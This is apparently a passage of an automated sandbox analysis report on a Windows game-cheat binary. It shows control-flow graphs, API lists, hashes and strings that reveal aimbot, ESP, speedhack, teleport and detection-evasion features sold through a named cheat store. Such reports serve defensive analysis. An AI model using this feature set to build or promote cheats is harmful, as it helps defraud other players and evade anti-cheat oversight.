447->415
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ClientCursorState$Screenmemcpy$ActiveCounterPerformanceQueryRectWindowfreemalloc
                              • String ID: ##Aimbot$##Exploits$##Misc$##Visuals$2$2$Aim Shake (+- m)$Aim while jumping$Aimbot$Aimbot Aim Line$Aimbot Distance Limit (m)$Aimbot Fov$Aimbot Fov Circle$Aimbot Key$Aimbot Smooth$Character ESP$CheatLoverz.store$Chest Rate$Crosshair$Debug Info$Debug World Items Max Distance (m)$Delay (ms)$Discord server$Exploits$Exploits (DETECTION RISK!) Below$Head Rate$Instant Revive$Limit Teleport Distance (No Damage Limit)$Lines from crosshair/muzzle$Loot ESP$ManhattenQC ESP$Misc$Neck Rate$No bloom (HIGH RISK)$No spread (HIGH RISK)$Pelvis Rate$Pickup Distance Limit(m)$Player Teleport (may freeze)$Radar Position (X,Y)%$Radar Size(px), Resolution(m)$Refresh Rate$Reset Dx$Scale Text$Shake Speed (cm/s)$Show menu on start$Silent Aim$Skeleton ESP$Skeleton Only Behind Walls$SpeedHack$SpeedHack Toggle/Hotkey$Stream Proof$Supply/Chest/Ammno/Trap Distance Limit (m)$Teleport Vehicle to Map Marker (Key: Enter)$Tips: Use middle mouse for sliders and F8 to toggle Menu$Trap/Projectiles/ ESP$Trigger distance limit (m)$Trigger spray distance limit (m)$Triggerbot$Triggerbot spread$Vehicle Distance Limit (m)$Vehicle ESP$Velocity Adjust$Visibilty Check$Visuals$Visuals Toggle Button$[%.fM]
                              • API String ID: 2372690006-378993347
                              • Opcode ID: 787a01ce0175e07ad6569f3f0a62db25fe358f7210c8c78cf02ed56572ea0b2f
                              • Instruction ID: 506bd9cf3f5e0ed11847d69fa8d3610ad922a6147877ce85b828ecdfef36846d
                              • Opcode Fuzzy Hash: 787a01ce0175e07ad6569f3f0a62db25fe358f7210c8c78cf02ed56572ea0b2f
                              • Instruction Fuzzy Hash: 0C334332915BC99ADB01CB37C8402BC7B60FFD9B54F0ACB75DA09672B1DF26A0859B11

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 674 7ff62c0ce300-7ff62c0ce337 675 7ff62c0ce340-7ff62c0ce364 PeekMessageA 674->675 676 7ff62c0ce380-7ff62c0ce38d GetForegroundWindow 675->676 677 7ff62c0ce366-7ff62c0ce37a TranslateMessage DispatchMessageA 675->677 678 7ff62c0ce3c3-7ff62c0ce3d0 GetAsyncKeyState 676->678 679 7ff62c0ce38f-7ff62c0ce3bd GetWindow SetWindowPos 676->679 677->676 680 7ff62c0ce633-7ff62c0ce66c exit call 7ff62c0c2c30 678->680 681 7ff62c0ce3d6-7ff62c0ce47a GetClientRect ClientToScreen GetCursorPos GetAsyncKeyState 678->681 679->678 687 7ff62c0ce66e 680->687 688 7ff62c0ce688-7ff62c0ce68b 680->688 682 7ff62c0ce47c-7ff62c0ce496 681->682 683 7ff62c0ce498 681->683 686 7ff62c0ce49f-7ff62c0ce4b1 682->686 683->686 689 7ff62c0ce4b3-7ff62c0ce4b9 686->689 690 7ff62c0ce4cf-7ff62c0ce52a SetWindowPos 686->690 691 7ff62c0ce673-7ff62c0ce687 687->691 692 7ff62c0ce763-7ff62c0ce776 PostQuitMessage exit 688->692 693 7ff62c0ce691-7ff62c0ce694 688->693 689->690 694 7ff62c0ce4bb-7ff62c0ce4c5 689->694 696 7ff62c0ce533-7ff62c0ce53f call 7ff62c0c9f80 690->696 697 7ff62c0ce696-7ff62c0ce6a7 DefWindowProcA 693->697 698 7ff62c0ce6a9-7ff62c0ce6b3 693->698 694->690 695 7ff62c0ce4c7-7ff62c0ce4cd 694->695 695->690 695->696 696->675 704 7ff62c0ce545-7ff62c0ce54c 696->704 697->691 700 7ff62c0ce75c-7ff62c0ce75e 698->700 701 7ff62c0ce6b9-7ff62c0ce6bd 698->701 700->691 701->700 703 7ff62c0ce6c3-7ff62c0ce6cb 701->703 705 7ff62c0ce733-7ff62c0ce757 call 7ff62c0c2980 703->705 706 7ff62c0ce6cd-7ff62c0ce6d9 703->706 707 7ff62c0ce54e-7ff62c0ce558 704->707 708 7ff62c0ce5ab-7ff62c0ce5e0 call 7ff62c0a6770 704->708 705->700 709 7ff62c0ce6db-7ff62c0ce6e1 706->709 710 7ff62c0ce6e8-7ff62c0ce6f2 706->710 713 7ff62c0ce55a-7ff62c0ce560 707->713 714 7ff62c0ce567-7ff62c0ce571 707->714 727 7ff62c0ce5e2-7ff62c0ce5f4 call 7ff62c0b29b0 708->727 728 7ff62c0ce60b-7ff62c0ce632 DestroyWindow call 7ff62c0cf650 708->728 709->710 715 7ff62c0ce6f4-7ff62c0ce6fa 710->715 716 7ff62c0ce701-7ff62c0ce712 710->716 713->714 721 7ff62c0ce573-7ff62c0ce579 714->721 722 7ff62c0ce580-7ff62c0ce591 714->722 715->716 717 7ff62c0ce714 716->717 718 7ff62c0ce71a-7ff62c0ce72c 716->718 717->718 718->705 721->722 724 7ff62c0ce593 722->724 725 7ff62c0ce599-7ff62c0ce5a7 722->725 724->725 725->708 735 7ff62c0ce5fc-7ff62c0ce606 free 727->735 736 7ff62c0ce5f6 727->736 735->728 736->735
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Window$Message$AsyncClientStateexit$CursorDestroyDispatchForegroundPeekPostProcQuitRectScreenTranslatefree
                              • String ID: Gideion
                              • API String ID: 668840768-1545131839
                              • Opcode ID: 0c8a0e5ddc37e4d5efde03353666bf3b3b2b7c76448a3e914d3988d3f2c76c32
                              • Instruction ID: 1d00eefbcfede93a9a01a215f78746fc673a786cdb5357d7d9c5c5a197336c33
                              • Opcode Fuzzy Hash: 0c8a0e5ddc37e4d5efde03353666bf3b3b2b7c76448a3e914d3988d3f2c76c32
                              • Instruction Fuzzy Hash: 97D13935A18B8286EF10CB15EC8027977A0FF99BA4F144136DA5D837A4DF3EE584C712
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free$malloc$memset
                              • String ID:
                              • API String ID: 1620901979-0
                              • Opcode ID: 0cd76954bdf1da716863ed24f0d37e0672295474ecdd576644e884f3d2fb540d
                              • Instruction ID: 5f2e6f1a49a3ca082a3ee134548bb514dfa6f51da1a4886c7ac5217ecbe52f31
                              • Opcode Fuzzy Hash: 0cd76954bdf1da716863ed24f0d37e0672295474ecdd576644e884f3d2fb540d
                              • Instruction Fuzzy Hash: EFB2E036A04B848AEB54CF26D8406BD77A4FB49B94F148336EE4D93794DF3AE491CB01

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1121 7ff62c0b4d50-7ff62c0b4dd5 call 7ff62c0b4b80 1124 7ff62c0b59ec 1121->1124 1125 7ff62c0b4ddb-7ff62c0b4dfc 1121->1125 1128 7ff62c0b59ee-7ff62c0b5a40 1124->1128 1126 7ff62c0b51fe-7ff62c0b5202 1125->1126 1127 7ff62c0b4e02-7ff62c0b4e72 1125->1127 1131 7ff62c0b5204-7ff62c0b5208 1126->1131 1132 7ff62c0b51eb-7ff62c0b51f9 1126->1132 1129 7ff62c0b4e74 1127->1129 1130 7ff62c0b4e7a-7ff62c0b4e93 malloc 1127->1130 1129->1130 1130->1124 1133 7ff62c0b4e99-7ff62c0b4ea9 1130->1133 1134 7ff62c0b520b-7ff62c0b524c 1131->1134 1132->1128 1135 7ff62c0b4eaf-7ff62c0b4ebd 1133->1135 1136 7ff62c0b51a9-7ff62c0b51bb 1133->1136 1137 7ff62c0b524e-7ff62c0b5252 1134->1137 1138 7ff62c0b52a9-7ff62c0b52ad 1134->1138 1140 7ff62c0b4ec0-7ff62c0b4ec2 1135->1140 1139 7ff62c0b51be-7ff62c0b51e8 call 7ff62c0b4c60 1136->1139 1141 7ff62c0b5284-7ff62c0b5290 1137->1141 1142 7ff62c0b5254-7ff62c0b5282 1137->1142 1143 7ff62c0b52e0-7ff62c0b52e4 1138->1143 1144 7ff62c0b52af-7ff62c0b52db 1138->1144 1139->1132 1146 7ff62c0b4ee4 1140->1146 1147 7ff62c0b4ec4-7ff62c0b4ece 1140->1147 1148 7ff62c0b5294-7ff62c0b52a5 1141->1148 1142->1148 1150 7ff62c0b5332-7ff62c0b5335 1143->1150 1151 7ff62c0b52e6-7ff62c0b532d 1143->1151 1149 7ff62c0b53de-7ff62c0b53f8 1144->1149 1159 7ff62c0b4ee7-7ff62c0b4ef2 1146->1159 1157 7ff62c0b4ed0 1147->1157 1158 7ff62c0b4ed4-7ff62c0b4ee2 1147->1158 1148->1138 1155 7ff62c0b5405-7ff62c0b540d sqrtf 1149->1155 1156 7ff62c0b53fa-7ff62c0b5403 1149->1156 1152 7ff62c0b53be-7ff62c0b53d8 1150->1152 1153 7ff62c0b533b-7ff62c0b53bc 1150->1153 1151->1149 1152->1149 1153->1149 1160 7ff62c0b5411-7ff62c0b542b 1155->1160 1156->1160 1157->1158 1158->1159 1159->1140 1161 7ff62c0b4ef4-7ff62c0b4f07 1159->1161 1162 7ff62c0b5438-7ff62c0b543d sqrtf 1160->1162 1163 7ff62c0b542d-7ff62c0b5436 1160->1163 1164 7ff62c0b4f10-7ff62c0b4f1d 1161->1164 1167 7ff62c0b5441-7ff62c0b545e call 7ff62c0b71f0 1162->1167 1163->1167 1165 7ff62c0b4f1f-7ff62c0b4f31 1164->1165 1166 7ff62c0b4f33-7ff62c0b4f35 1164->1166 1168 7ff62c0b4f50-7ff62c0b4f5c 1165->1168 1166->1168 1169 7ff62c0b4f37-7ff62c0b4f4c 1166->1169 1174 7ff62c0b5464-7ff62c0b546e 1167->1174 1175 7ff62c0b5986-7ff62c0b598a 1167->1175 1168->1164 1171 7ff62c0b4f5e-7ff62c0b4f68 1168->1171 1169->1168 1173 7ff62c0b4f70-7ff62c0b4f7d 1171->1173 1177 7ff62c0b4f7f-7ff62c0b4f91 1173->1177 1178 7ff62c0b4f93-7ff62c0b4f95 1173->1178 1179 7ff62c0b5474-7ff62c0b548a 1174->1179 1180 7ff62c0b57d6-7ff62c0b57d8 1174->1180 1175->1132 1176 7ff62c0b5990-7ff62c0b5996 1175->1176 1176->1134 1183 7ff62c0b4fb0-7ff62c0b4fbc 1177->1183 1178->1183 1184 7ff62c0b4f97-7ff62c0b4fac 1178->1184 1185 7ff62c0b5490-7ff62c0b57c6 1179->1185 1181 7ff62c0b58c0-7ff62c0b58ca 1180->1181 1182 7ff62c0b57de-7ff62c0b57e2 1180->1182 1187 7ff62c0b58d2-7ff62c0b58ef malloc 1181->1187 1188 7ff62c0b58cc 1181->1188 1186 7ff62c0b57e6-7ff62c0b57ed 1182->1186 1183->1173 1189 7ff62c0b4fbe-7ff62c0b4fe0 1183->1189 1184->1183 1185->1185 1190 7ff62c0b57cc-7ff62c0b57cf 1185->1190 1192 7ff62c0b57f0-7ff62c0b58ba 1186->1192 1193 7ff62c0b58f5-7ff62c0b58fb 1187->1193 1194 7ff62c0b599b-7ff62c0b599e 1187->1194 1188->1187 1195 7ff62c0b4fe3-7ff62c0b500d 1189->1195 1190->1186 1191 7ff62c0b57d1 1190->1191 1191->1181 1192->1181 1192->1192 1198 7ff62c0b590c-7ff62c0b5927 memcpy 1193->1198 1199 7ff62c0b58fd-7ff62c0b5907 memcpy 1193->1199 1196 7ff62c0b59a0-7ff62c0b59aa 1194->1196 1197 7ff62c0b59c1-7ff62c0b59cc 1194->1197 1200 7ff62c0b5013-7ff62c0b5016 1195->1200 1201 7ff62c0b50ec-7ff62c0b50ee 1195->1201 1202 7ff62c0b59b2-7ff62c0b59bc free 1196->1202 1203 7ff62c0b59ac 1196->1203 1197->1124 1206 7ff62c0b59ce-7ff62c0b59d8 1197->1206 1207 7ff62c0b5929-7ff62c0b5933 1198->1207 1208 7ff62c0b594a-7ff62c0b5958 1198->1208 1199->1198 1209 7ff62c0b505e-7ff62c0b5069 1200->1209 1210 7ff62c0b5018-7ff62c0b5059 call 7ff62c0b4c60 1200->1210 1204 7ff62c0b50f0-7ff62c0b50f2 1201->1204 1205 7ff62c0b5133-7ff62c0b513e 1201->1205 1202->1197 1203->1202 1213 7ff62c0b5121-7ff62c0b5131 1204->1213 1214 7ff62c0b50f4-7ff62c0b511c 1204->1214 1217 7ff62c0b5140-7ff62c0b5148 1205->1217 1218 7ff62c0b514a-7ff62c0b514f 1205->1218 1215 7ff62c0b59e0-7ff62c0b59e7 free 1206->1215 1216 7ff62c0b59da 1206->1216 1219 7ff62c0b5935 1207->1219 1220 7ff62c0b593b-7ff62c0b5945 free 1207->1220 1222 7ff62c0b596c-7ff62c0b597e free 1208->1222 1223 7ff62c0b595a-7ff62c0b5964 1208->1223 1211 7ff62c0b509f-7ff62c0b50a2 1209->1211 1212 7ff62c0b506b-7ff62c0b5083 1209->1212 1210->1209 1227 7ff62c0b50a5-7ff62c0b50e7 1211->1227 1225 7ff62c0b5085-7ff62c0b5091 1212->1225 1226 7ff62c0b5093-7ff62c0b509d 1212->1226 1228 7ff62c0b5183-7ff62c0b5199 1213->1228 1214->1213 1215->1124 1216->1215 1229 7ff62c0b5152-7ff62c0b517d 1217->1229 1218->1229 1219->1220 1220->1208 1222->1175 1223->1222 1224 7ff62c0b5966 1223->1224 1224->1222 1225->1227 1226->1227 1227->1228 1228->1195 1231 7ff62c0b519f-7ff62c0b51a7 1228->1231 1229->1228 1231->1139
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free$mallocmemcpysqrtf
                              • String ID:
                              • API String ID: 943526449-0
                              • Opcode ID: 0ff9c9956987492927c662ad6b4145456a3da9b57a831e645ae833e85ae0cdd3
                              • Instruction ID: cd9fa3646216eacdd6f7123db2872d16d0ac999e7bba7ee21c3e41402b275e44
                              • Opcode Fuzzy Hash: 0ff9c9956987492927c662ad6b4145456a3da9b57a831e645ae833e85ae0cdd3
                              • Instruction Fuzzy Hash: 5C72AB22E28BE845D713C736544227AA6D1EF6E784F19D333EE49A6661DF3EE442C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 313767242-0
                              • Opcode ID: c0b6c58100d424723d771673bda06a009e4ae6bdc370d546d38c9e27518e0b24
                              • Instruction ID: f150f79692f9147bf69392c2eedd814a069ff94e900b3861ea2956f82e4d3a41
                              • Opcode Fuzzy Hash: c0b6c58100d424723d771673bda06a009e4ae6bdc370d546d38c9e27518e0b24
                              • Instruction Fuzzy Hash: 1D315E72609B8186EB608F60EC407ED7764FB88758F44443ADB4E87B99DF39D648C704
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: sqrtf
                              • String ID:
                              • API String ID: 321154650-0
                              • Opcode ID: 2aeaee29e4b4a54f73a39816d4fe9bebab73c2cbc8efa71cc2618576ad85fdd0
                              • Instruction ID: aacf6b057d53b4234f1b9c06fa37c0f30c029feb93e04fc5d1a1cd7251b13ed1
                              • Opcode Fuzzy Hash: 2aeaee29e4b4a54f73a39816d4fe9bebab73c2cbc8efa71cc2618576ad85fdd0
                              • Instruction Fuzzy Hash: F9B1C622E28BCC81E623963354821FAE250AFBF3D5F2DDB23FD84756B2AF2561D15540
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Clipboard$CriticalSection$CloseEnterGlobal$DataInit_thread_footerLeaveLockOpenUnlockfree
                              • String ID:
                              • API String ID: 1560965594-0
                              • Opcode ID: 9d196a3fc83a9f5a7743c28566c4774a8a7c6b66864d16906c6edbfbdf23186c
                              • Instruction ID: a8dca7dcfb4ee39072ae8a5ebcff9238b5dd748eb03963b01587851570494332
                              • Opcode Fuzzy Hash: 9d196a3fc83a9f5a7743c28566c4774a8a7c6b66864d16906c6edbfbdf23186c
                              • Instruction Fuzzy Hash: 09413F21A18B4382FF44DB51AC9027923A1FF88BA0F445575D91EC37A5EF3EE9458702
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                              • String ID:
                              • API String ID: 453615576-0
                              • Opcode ID: 6284ea59a3732fccb56e1a1851666f2e9564361494126d10d765fd1194a115ca
                              • Instruction ID: b5c1a890d830d356af3ff8e0c1ba81f7c4d66b6916ec39838466b4b6b7768cac
                              • Opcode Fuzzy Hash: 6284ea59a3732fccb56e1a1851666f2e9564361494126d10d765fd1194a115ca
                              • Instruction Fuzzy Hash: F811B125B0870282EF109B15AC18379A391EF8ABE1F088035DA4EC67A5DF2EEC458702
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: powf$fmodf
                              • String ID:
                              • API String ID: 2099400205-0
                              • Opcode ID: 0c0d48fdabba15076126b4af9f5a3018bc999265989382c921905e10a524fa04
                              • Instruction ID: e80b65ad10bae544c0b4ec121285d07b5fef11a9851f1de8e786683db6eefa5b
                              • Opcode Fuzzy Hash: 0c0d48fdabba15076126b4af9f5a3018bc999265989382c921905e10a524fa04
                              • Instruction Fuzzy Hash: D322F632D18B8D85E7129B7788411B8B350FF6E3A8F199B32FD48761E1DF2AB1819711
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: sqrtf
                              • String ID:
                              • API String ID: 321154650-0
                              • Opcode ID: 540d3ff0a6dadd1e9ad01d68575868912d4e61fd6ec709d9a144940724227262
                              • Instruction ID: 184261f7528be5d5f1355aa9edd089dbc429c350386ae88f89e532c67e47396b
                              • Opcode Fuzzy Hash: 540d3ff0a6dadd1e9ad01d68575868912d4e61fd6ec709d9a144940724227262
                              • Instruction Fuzzy Hash: 1AA26A33924B889AD712CF37D4811A8B760FF6D798B199B16EB0963761DB34F1A4DB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: sqrtf
                              • String ID: (
                              • API String ID: 321154650-3887548279
                              • Opcode ID: ac657b2c4dfe38cbb9dc794152d525485ad6c36f22a2cd517f84b099d641925c
                              • Instruction ID: d4a02563bdb00baaaf6e2a491420706bb58eba04c5c5c0079c794e76cc7c651f
                              • Opcode Fuzzy Hash: ac657b2c4dfe38cbb9dc794152d525485ad6c36f22a2cd517f84b099d641925c
                              • Instruction Fuzzy Hash: 3012B233A24BC886D712CF3B84421ADB361EF6E798B19D712EA0973665DF35B0A1D740
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: freemallocmemset
                              • String ID:
                              • API String ID: 3809226132-0
                              • Opcode ID: fbba6ab974f7c18feb6c50abf0fdb33e336e1a1d525bb28d27b7b233eafd0284
                              • Instruction ID: 4cf05703777700ab7cdb7abfb89abe87ff69d69173ffecb329df0616ecbe74fc
                              • Opcode Fuzzy Hash: fbba6ab974f7c18feb6c50abf0fdb33e336e1a1d525bb28d27b7b233eafd0284
                              • Instruction Fuzzy Hash: 1CD1D332A09B8586EB21CB29D4412B9B3A4FF98794F099331EB4CA3764DF3AF551C701
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ceilffloorf
                              • String ID:
                              • API String ID: 300201839-0
                              • Opcode ID: 2a0fadcd38f7d532cd5e313d664216abb2175ca296a21c59b57e0a598e2814fd
                              • Instruction ID: 54ab973f9a8080bca66825f615ce4129b258956158d79c83e0b61c441789f248
                              • Opcode Fuzzy Hash: 2a0fadcd38f7d532cd5e313d664216abb2175ca296a21c59b57e0a598e2814fd
                              • Instruction Fuzzy Hash: 6CA12833A186D486D325CB36A0416BABBA1FB9D785F158326FAC863755DF3CD580CB40
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 404da5d8976d1f65c74cf5ca0df8bafecf5892086a85a90f0d541670af353162
